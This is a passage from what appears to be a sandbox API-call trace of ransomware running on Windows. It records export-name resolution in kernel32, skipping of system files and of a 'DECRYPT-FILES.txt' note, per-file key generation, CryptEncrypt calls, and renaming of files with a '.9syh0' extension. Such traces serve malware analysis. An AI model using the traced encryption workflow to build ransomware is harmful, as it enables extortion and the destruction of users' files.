lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.732] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.732] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.732] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.732] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.732] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.732] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.732] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.732] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.732] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.733] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.733] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.733] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.733] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.733] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.733] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.733] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.733] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.733] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.733] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.733] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.733] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.733] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.733] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.733] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.733] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.733] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.733] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.733] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.734] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.734] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.734] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.734] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.734] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.734] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.743] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.743] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\dEyib6wB.mp3") returned 73 [0085.743] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\dEyib6wB.mp3.9syh0") returned 79 [0085.743] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\dEyib6wB.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\deyib6wb.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\dEyib6wB.mp3.9syh0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\deyib6wb.mp3.9syh0"), dwFlags=0x0) returned 1 [0085.744] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.744] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.744] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.745] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd312e670, ftCreationTime.dwHighDateTime=0x1d4c7bb, ftLastAccessTime.dwLowDateTime=0xea14aba0, ftLastAccessTime.dwHighDateTime=0x1d4cf55, ftLastWriteTime.dwLowDateTime=0xea14aba0, ftLastWriteTime.dwHighDateTime=0x1d4cf55, nFileSizeHigh=0x0, nFileSizeLow=0xda25, dwReserved0=0x0, dwReserved1=0x0, cFileName="i8_B4K3DPMoDG.m4a", cAlternateFileName="I8_B4K~1.M4A")) returned 1 [0085.745] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a", lpString2="DECRYPT-FILES.txt") returned 1 [0085.745] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a", lpString2="autorun.inf") returned 1 [0085.745] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a", lpString2="boot.ini") returned 1 [0085.745] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a", lpString2="desktop.ini") returned 1 [0085.745] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a", lpString2="ntuser.dat") returned -1 [0085.745] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a", lpString2="iconcache.db") returned -1 [0085.745] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a", lpString2="bootsect.bak") returned 1 [0085.745] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a", lpString2="ntuser.dat.log") returned -1 [0085.745] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a", lpString2="thumbs.db") returned -1 [0085.745] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a", lpString2="Bootfont.bin") returned 1 [0085.745] lstrlenW (lpString="i8_B4K3DPMoDG.m4a") returned 17 [0085.745] lstrcmpiW (lpString1="m4a", lpString2="lnk") returned 1 [0085.745] lstrcmpiW (lpString1="m4a", lpString2="exe") returned 1 [0085.745] lstrcmpiW (lpString1="m4a", lpString2="sys") returned -1 [0085.745] lstrcmpiW (lpString1="m4a", lpString2="dll") returned 1 [0085.745] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0085.745] lstrlenW (lpString="i8_B4K3DPMoDG.m4a") returned 17 [0085.745] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0085.745] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="i8_B4K3DPMoDG.m4a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\i8_B4K3DPMoDG.m4a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\i8_B4K3DPMoDG.m4a" [0085.745] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.745] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\i8_B4K3DPMoDG.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\i8_b4k3dpmodg.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0085.746] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=55845) returned 1 [0085.746] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0085.746] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.746] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.746] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.746] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.746] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0085.747] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.748] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.748] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.749] CloseHandle (hObject=0x43c) returned 1 [0085.749] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.749] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0085.750] CloseHandle (hObject=0x0) returned 0 [0085.750] CloseHandle (hObject=0x438) returned 1 [0085.750] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.750] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.750] GetTickCount () returned 0x114de4e [0085.750] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.751] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.751] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.751] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.751] lstrlenA (lpString="kernel32.dll") returned 12 [0085.751] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.751] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.751] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.751] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.752] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.752] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.752] lstrlenA (lpString="ADDATOMA") returned 8 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.752] lstrlenA (lpString="ADDATOMW") returned 8 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.752] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.752] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.752] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.752] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.752] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.752] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.752] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.752] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.752] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.752] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.752] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.752] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.752] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.752] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.752] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.753] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.753] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.753] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.753] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.753] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.753] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.753] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.753] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.753] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.753] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.753] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.753] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.753] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.753] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.753] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.753] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.753] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.753] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.753] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.753] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.754] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.754] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.754] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.754] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.754] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.754] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.754] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.754] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.754] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.754] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.754] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.754] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.754] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.754] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" 